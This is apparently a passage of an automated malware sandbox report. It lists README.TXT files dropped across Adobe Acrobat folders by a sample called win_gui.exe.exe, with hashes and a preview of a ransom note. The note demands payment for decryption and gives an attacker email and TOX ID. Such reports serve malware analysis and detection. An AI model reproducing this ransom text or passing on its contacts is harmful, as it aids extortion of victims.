                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\send-for-sign\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sign-services-auth\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\signatures\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\task-handler\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\tracked-send\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\uss-search\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\walk-through\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\versions\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\locales\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\swiftshader\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\ie\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\regular\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Resource\Font\Pfm\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Resource\TypeSupport\Unicode\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
